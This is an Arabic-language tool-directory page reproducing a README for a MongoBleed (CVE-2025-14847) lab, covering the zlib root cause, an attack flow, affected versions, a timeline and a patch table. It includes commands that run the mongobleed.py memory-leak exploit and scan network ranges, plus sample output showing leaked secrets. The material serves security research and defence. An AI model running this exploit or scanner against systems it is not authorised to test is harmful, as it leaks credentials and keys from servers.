Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
mongobleed-exploit-CVE-2025-14847 — استغلال، مختبر، ماسح - خارجي وحاوية دوكر، لـ SMongobleed-CVE-2025-14847 بالإضافة إلى رافع الأمان phoenix | Kitploit
أدوات/GitHubGitHub/franksec42/mongobleed-exploit-cve-2025-14847
أمن الحاوياتتحليل الذاكرة الجنائيتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن السحابةالتعلم والتعليمأمن قواعد البياناتمختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubfranksec42/mongobleed-exploit-cve-2025-14847

mongobleed-exploit-CVE-2025-14847

استغلال، مختبر، ماسح - خارجي وحاوية دوكر، لـ SMongobleed-CVE-2025-14847 بالإضافة إلى رافع الأمان phoenix

عرض المستودع
31منذ 7 أشهرلم تتم المراجعة بعد

🩸 MongoBleed - CVE-2025-14847 مختبر أبحاث الأمان

شعار MongoBleed

CVE-2025-14847 | CVSS 8.7 (عالي) | تسريب غير مصادق عليه للذاكرة


CVE-2025-14847، المسمى MongoBleed، يسمح للمهاجمين عن بُعد غير مصادق عليهم بتسريب ذاكرة كومة غير مهيأة عن طريق استغلال منطق فك الضغط zlib في MongoDB. هذا الخلل عالي الخطورة يكشف آثارًا حساسة، بما في ذلك بيانات الاعتماد النصية العادية ورموز الجلسات، مما يوفر خريطة طريق للحركة الجانبية والاستيلاء الكامل على الخادم.

📖 الوثائق الكاملة →


TL;DR لفرق الهندسة

الجانبالتفاصيل
ما هو الثغرةطبقة نقل شبكة MongoDB باستخدام ضغط zlib
الخطورةعالية (CVSS 8.7/7.5)
التأثيرتسريب غير مصادق عليه عن بُعد لذاكرة كومة غير مهيأة
لماذا يهمتحتوي الشظايا المسربة على كلمات مرور قواعد البيانات، مفاتيح AWS السرية، وحالات الخادم الداخلية
حالة الاستغلالبرهان المفهوم العام (PoC) "mongobleed" تم التحقق من صحته ويتداول
ما يجب فعله اليومالترقية إلى الإصدارات المصححة فورًا أو تعطيل ضغط zlib

نطاق التعرض

  • 87,000 - 194,000 مثيل MongoDB معروض للعامة
  • 42% من بيئات السحابة متأثرة (بحث Wiz)
  • لا يتطلب مصادقة - يتم الاستغلال قبل المصادقة

🔬 تشريح الثغرة

التحليل الفني

توجد الثغرة في طبقة نقل الشبكة لـ MongoDB (message_compressor_zlib.cpp) حيث يسمح خلل حرج في منطق فك ضغط zlib للمهاجمين غير المصادق عليهم بتسريب ذاكرة الخادم الحساسة.

السبب الجذري

root@kitploit:~
// كود ضعيف (قبل الإصلاح)
counterHitDecompress(input.length(), output.length());
return {output.length()};  // ❌ يعيد حجم المخزن المؤقت المخصص

// كود مصحح (بعد الإصلاح)
counterHitDecompress(input.length(), output.length());
return length;             // ✅ يعيد الطول الفعلي للبيانات المفكوكة

تدفق الاستغلال

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────────┐
│                        ناقل هجوم MongoBleed                                │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                              │
│   المهاجم                         MongoDB الضعيف                            │
│      │                                    │                                  │
│      │  1. إرسال رسالة OP_COMPRESSED      │                                  │
│      │     uncompressedSize: 8192 (كذب)   │                                  │
│      │     البيانات الفعلية: ~100 بايت    │                                  │
│      │────────────────────────────────────>                                  │
│      │                                    │                                  │
│      │                          2. تخصيص مخزن مؤقت بحجم 8192 بايت           │
│      │                          3. فك ضغط ~100 بايت                         │
│      │                          4. الخلل: إرجاع buffer.length() = 8192     │
│      │                          5. محلل BSON يقرأ ذاكرة غير مهيأة           │
│      │                                    │                                  │
│      │  6. استجابة خطأ تحتوي على ذاكرة    │                                  │
│      │     مسربة كـ "أسماء حقول"           │                                  │
│      │<────────────────────────────────────                                  │
│      │                                    │                                  │
│   🔓 البيانات المسربة:                    │                                  │
│      - مفاتيح API، كلمات مرور، رموز مميزة                                    │
│      - الحالة الداخلية لـ MongoDB                                            │
│      - تكوينات تخزين WiredTiger                                             │
│      - معلومات /proc النظام                                                  │
│      - بيانات اتصالات العملاء                                                │
│                                                                              │
└─────────────────────────────────────────────────────────────────────────────┘

الإصدارات المتأثرة

الجدول الزمني للاكتشاف

التاريخالحدث
15 ديسمبر 2025تم تحديد الثغرة؛ التذكرة الداخلية SERVER-115508
19 ديسمبر 2025

📁 هيكل المشروع

root@kitploit:~
mongobleed-exploit-CVE-2025-14847/
├── exploit/                    # 🔴 مختبر الاستغلال
│   ├── docker-compose.yml      # مثيلات MongoDB ضعيفة ومصححة
│   ├── mongobleed.py           # برهان استغلال تسريب الذاكرة
│   ├── init/init-mongo.js      # بيانات اختبار حساسة
│   ├── test-exploit.sh         # سكريبت اختبار المختبر
│   └── README.md               # وثائق المختبر
│
├── scanner/                    # 🌐 ماسح الشبكة
│   ├── mongobleed_scanner.py   # ماسح ثغرات IP/النطاق
│   ├── sample-targets.txt      # ملف أهداف عينة
│   └── README.md               # وثائق الماسح
│
├── code-scan/                  # 📂 ماسح الشفرة
│   ├── main.py                 # نقطة دخول CLI
│   ├── scanners/               # ماسحات Docker، Python، البنية التحتية
│   ├── models/                 # نماذج الاكتشاف والثغرة
│   ├── integrations/           # رفع إلى Phoenix Security
│   └── README.md               # وثائق ماسح الشفرة
│
└── original-exploit/           # 📚 مرجع PoC الأصلي

🚀 بدء سريع

1. مختبر الاستغلال

root@kitploit:~
cd exploit

# بدء المختبر (مثيلات ضعيفة ومصححة)
docker-compose up -d
sleep 10

# اختبار المثيل الضعيف (يجب أن يسرب الذاكرة)
python3 mongobleed.py --host localhost --port 27017

# اختبار المثيل المصحح (يجب ألا يسرب الذاكرة)
python3 mongobleed.py --host localhost --port 27018

# اختبار المختبر الكامل
./test-exploit.sh

2. ماسح الشبكة

root@kitploit:~
cd scanner

# مسح مضيف واحد
python3 mongobleed_scanner.py 192.168.1.100

# مسح نطاق شبكة
python3 mongobleed_scanner.py 192.168.1.0/24

# مسح من ملف
python3 mongobleed_scanner.py @sample-targets.txt --json --output results.json

3. ماسح الشفرة

root@kitploit:~
cd code-scan

# مسح مشروع بحثًا عن إصدارات MongoDB الضعيفة
python3 main.py scan /path/to/project

# مسح ورفع إلى Phoenix
python3 main.py scan /path/to/project --upload-phoenix

# تشغيل الاختبارات
python3 main.py test

⚡ أوامر سريعة

root@kitploit:~
# === مختبر الاستغلال ===
# بدء المختبر
cd exploit && docker-compose up -d && sleep 10

# تشغيل الاستغلال (المثيل الضعيف)
python3 exploit/mongobleed.py --host localhost --port 27017

# تشغيل الاستغلال (المثيل المصحح - تحقق من عدم وجود تسريبات)
python3 exploit/mongobleed.py --host localhost --port 27018

# === ماسح الشبكة ===
# مسح المختبر المحلي
python3 scanner/mongobleed_scanner.py localhost:27017 localhost:27018

# مسح شبكة
python3 scanner/mongobleed_scanner.py 192.168.1.0/24 --threads 20

# === ماسح الشفرة ===
# مسح الدليل الحالي
python3 code-scan/main.py scan .

# مسح مع إخراج JSON
python3 code-scan/main.py scan /path/to/project --json --output results.json

# مسح ورفع إلى Phoenix
python3 code-scan/main.py scan /path/to/project --upload-phoenix

📊 أمثلة الإخراج

إخراج الاستغلال

root@kitploit:~
[*] mongobleed - CVE-2025-14847 تسريب ذاكرة MongoDB
[*] الهدف: localhost:27017
[*] مسح الإزاحات 20-8192...

[+] offset=  117 len=  39: ssions^\u0001�r��*YDr���
[+] offset=16582 len=1552: MemAvailable:    8554792 kB\nBuffers: ...
[+] offset=18731 len=3908: MONGOBLEED_PRIVATE_KEY_DATA_123...

[!] الهدف ضعيف لـ CVE-2025-14847
[*] إجمالي المسرب: 8748 بايت
[*] الشظايا الفريدة: 42

[!] تم اكتشاف أسرار محتملة:
    • مفتاح RSA خاص
    • سر مختبر

إخراج ماسح الشبكة

root@kitploit:~
[*] مسح 254 هدفًا بـ 10 خيوط...

[1/254] 192.168.1.10:27017 - 8.2.2 [ضعيف - مؤكد]
[2/254] 192.168.1.11:27017 - 8.2.3 [آمن]

الملخص:
----------------------------------------
إجمالي الأهداف الممسوحة: 254
المضيفات القابلة للوصول: 12
مثيلات MongoDB: 8
ضعيف: 3

إخراج ماسح الشفرة

root@kitploit:~
================================================================================
تقرير ماسح شفرة MONGOBLEED - CVE-2025-14847
================================================================================

🚨 تم اكتشاف إصدارات MongoDB ضعيفة

1. [email protected]
   الملف: /project/docker-compose.yml
   النوع: docker-compose
   السبب: الإصدار 8.2.2 ضمن النطاق الضعيف [8.2.0 - 8.2.2]
   ✅ الترقية إلى: 8.2.3
   CVE: CVE-2025-14847

🔗 تكامل Phoenix Security

تدعم جميع الماسحات رفع النتائج إلى منصة Phoenix Security:

root@kitploit:~
# إنشاء تكوين
python3 code-scan/main.py create-config
cp .phoenix.config.TEMPLATE .phoenix.config

# تحرير ببيانات اعتمادك
# [phoenix]
# client_id = your_client_id
# client_secret = your_client_secret
# api_base_url = https://api.securityphoenix.cloud

# مسح ورفع
python3 code-scan/main.py scan /path/to/project --upload-phoenix

🔐 إشعار أمني

⚠️ هام: هذه المجموعة مقدمة لأغراض اختبار الأمان المصرح به والبحث فقط.

  • اختبر فقط الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
  • قد تحتوي البيانات المسربة على معلومات حساسة - تعامل بمسؤولية
  • أبلغ عن الثغرات من خلال قنوات الإفصاح المناسبة

📚 الوثائق

🔗 المراجع الخارجية

  • إشعار OX Security
  • التزام إصلاح MongoDB
  • إدخال NVD - CVE-2025-14847

👤 الاعتمادات

  • الاستغلال الأصلي بواسطة Joe Desimone (@dez_)
  • تحسينات بيئة المختبر والماسح لأغراض البحث الأمني

📄 الترخيص

لاختبار الأمان المصرح به فقط. استخدم بمسؤولية.


آخر تحديث: ديسمبر 2025

تنزيل الأداة
الإصدارالنطاق الضعيفالإصدار المصححالحالة
8.2.x8.2.0 - 8.2.28.2.3✅ تم التصحيح
8.0.x8.0.0 - 8.0.168.0.17✅ تم التصحيح
7.0.x7.0.0 - 7.0.277.0.28✅ تم التصحيح
6.0.x6.0.0 - 6.0.266.0.27✅ تم التصحيح
5.0.x5.0.0 - 5.0.315.0.32✅ تم التصحيح
4.4.x4.4.0 - 4.4.294.4.30✅ تم التصحيح
4.2.xجميع الإصداراتلا يوجد⚠️ نهاية الدعم
4.0.xجميع الإصداراتلا يوجد⚠️ نهاية الدعم
3.6.xجميع الإصداراتلا يوجد⚠️ نهاية الدعم
تم إصدار الإصلاح، تم الكشف عن CVE-2025-14847
24 ديسمبر 2025تم تصحيح أسطول MongoDB Atlas
26 ديسمبر 2025تم إصدار PoC العام "mongobleed"
28 ديسمبر 2025تم رصد استغلال في البرية
المستندالوصف
DOCUMENTATION.mdوثائق المشروع الكاملة
TECHNICAL_ANALYSIS.mdتحليل معمق للثغرة
QUICK_COMMANDS.mdأوامر جاهزة للنسخ واللصق
exploit/README.mdوثائق مختبر الاستغلال
scanner/README.mdوثائق ماسح الشبكة
code-scan/README.mdوثائق ماسح الشفرة